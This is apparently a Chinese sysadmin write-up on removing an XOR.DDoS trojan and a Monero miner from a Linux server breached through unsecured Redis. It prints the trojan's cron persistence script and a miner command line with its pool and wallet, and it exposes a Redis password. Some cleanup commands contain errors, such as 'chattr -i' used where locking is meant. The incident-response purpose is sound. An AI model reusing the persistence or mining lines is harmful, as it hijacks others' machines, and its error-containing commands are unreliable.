Unix.Trojan.DDoS_XOR-1木马症状及清理办法

父进程名称: crond 进程名称: bash 进程路径: /usr/bin/bash 进程id: 20,517 命令行参数: /bin/sh /etc/cron.hourly/cron.sh 事件说明: XORDDoS木马入侵后，会在Linux的定时任务中植入恶意代码，定时启动后门程序，当发现该可疑进程时，很可能您的机器已经处于被入侵或者恶意发包的状态，建议您及时清理contab以及自启动项。帮助文档：https://help.aliyun.com/knowledge_detail/36279.html 解决方案: 建议立即及时清理计划任务中的恶意代码。

父进程名称: bash 进程名称: nohup 进程路径: /usr/bin/nohup 进程id: 12,283 命令行参数: nohup ./works -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 43ZSHb2kRK4P386GuQYTCyFbLmeuWrC1gLiUuzdK5KXiZPLuxPUYra4TC3p1TWAZxDf9PABYBpr34i4ha6UHY4tpPzJSR8k -p x -t1 事件说明: 黑客利用远程代码执行漏洞或者恶意木马在服务器中植入挖矿木马，占用机器所有CPU计算资源，严重影响服务器正常业务性能 解决方案: 建议立即KILL该挖矿进程，并及时清理计划任务中的恶意代码。具体详情可查看帮助：https://helpcdn.aliyun.com/knowledge_detail/41206.html

转http://blog.sina.com.cn/s/blog_8b79cd290102w7k9.html

http://www.cnblogs.com/IPYQ/p/6791256.html

http://www.cnblogs.com/red-code/p/5599393.html

http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/

http://blog.csdn.net/rainday0310/article/details/52327026

http://blog.csdn.net/whs_321/article/details/51734602

问题原因

数字校园应用的REDIS缓存系统存在BUG，致使服务器被注入了入侵者自己生成的公匙，并上传到了Redis的DATA目录，最终获取了服务器的root权限

影响范围

数字校园采用的Redis版本存在bug，影响所有部署的数字校园服务器，需全部更新

处理过程-修复REDIS

1、更新REDIS版本

2、修改配置文件，使用"bind 127.0.0.1"指令将REDIS限制侦听本地接口

3、启用REDIS访问密码,增加"requirepass=bluefin_redis_secret"参数，"bluefin_redis_secret"为数字校园连接redis的密码

处理过程-删除病毒：

1、使用clamav进行扫描，确定感染的文件目录

添加EPEL源，通过yum安装clamav并更新病毒库

yum install clamav && freshclam

clamav是一个开源的病毒库查杀工具，能识别病毒，但查杀能力极为有限，只能在扫描期删除病毒文件，对拥有进程监控和自我复制的病毒无能为力。

根目录扫描，确定受影响的文件和文件夹

clamscan -r --infected /

clamav扫描显示/usr/bin目录及/lib目录出现病毒文件，最终发现了一个/lib/libudev.so文件，及/usr/bin/目录下出现一些奇怪的可执行文件，确定为病毒。

2、尝试过使用clamav删除病毒，结果无效，clamav扫描结束后病毒进程更换程序名称重新出现。病毒可执行文件位于/usr/bin/目录，文件名为10个任意

字母组成，类似于“/usr/bin/kesabalwnw”，/etc/init.d目录有个同名的启动脚本/etc/init.d/kesabalwnw，用于开机自动启动病毒程序。

物理删除病毒或结束病毒进程无效，病毒会更换文件名，反复出现

3、经过分析发现/etc/cron.hourly多添加了一个gcc.sh脚本

脚本内容如下

#!/bin/sh

PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin

for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done

cp /lib/libudev.so /lib/libudev.so.6

/lib/libudev.so.6

5、通过netstat -tulnp指令，发现多了一个deamon服务，服务名称使用常见的"who,watch,id,ifconfig“等关键字代替，强行结束后会自动重启。linux上一般不存在

对应的系统服务，可怀疑跟病毒有关。可使用strace指令进行pid追踪，比如追踪pid为8572的进程，可查看该进程调用了哪些文件，对哪些文件进行了操作。

strace -tt -p 8572

在日志中发现了"/libudev.so"的身影，证实多出来的daemon服务是病毒运行的。

6、病毒会在/etc/init.d目录建立一个到多个10个字母组成的init脚本，脚本内容几乎一模一样，手动rm删除

7、病毒会在/etc/rc.d/{rc0.d,rc1.d,rc2,d,rc3,d,rc4,d,rc5.d}下建立非常多的以S90和K90开头的软连接，链接/etc/init.d目录下的病毒init脚本，可通过以下指令删除

清理/etc/rc.d目录，增加写保护

 find . -type l -name "K90*" -o -name "S90*" |grep -v crond|xargs rm -f && chattr -R +i /etc/rc.d/

8、删除/lib/libudev.so /lib/libudev.so.6并封锁/lib目录，禁止写入操作

rm -f /lib/libudev.so&&chattr +i /lib

9、禁止其它高风险目录的写权限

chattr -i /lib64 /bin /sbin /usr/sbin /usr/local

10、查找运行病毒进程名称，病毒为了防止被删除，通常用父进程在检测到病毒文件被物理删除后，自动生成新的病毒文件。可通过下列指令找出病毒父进程

[root@dt0b00021 etc]# lsof -R |grep "/usr/bin"

python    2197    1  root  txt       REG              253,0      4864    2099101 /usr/bin/python

hiiszdvzd 2354    1  root  txt       REG              253,0    625729    2100934 /usr/bin/hiiszdvzdv

11、去除父进程执行权限并缩短/usr/bin目录，防止病毒在/usr/bin生成新病毒文件

chmod 000 /usr/bin/hiiszdvzdv && chattr +i /usr/bin

12、去除后病毒主进程

ps aux|grep -i hiiszdvzdv|awk '{print $2}'|xargs kill -9

病毒捕获到kill指令的SIGAL TERM结束指令后会尝试在/usr/bin生成新病毒，但由于上一步骤禁止/usr/bin目录写入，这一过程会失败

重新检测/usr/bin目录启动的父进程可发现病毒进程已消失

[root@dt0b00021 etc]# lsof -R |grep "/usr/bin"

python    2197    1  root  txt       REG              253,0       4864    2099101 /usr/bin/python

[root@dt0b00021 etc]#

13、关闭服务器，用于flush内存，将驻留在内存中的病毒进程清除掉，注意此处必须为关闭，不能重启。重启服务器只会清空服务器引导阶段所需的部分内存，不能保证彻底清除病毒。

14、开启服务器，将关闭写权限的目录解禁

chattr -i -R /usr/bin /lib /lib64 /etc/init.d /etc/rc.d /usr/sbin /usr/local

15、使用clamav重新扫描，看是否有未清理干净的病毒文件残留

clamscan -r --infected /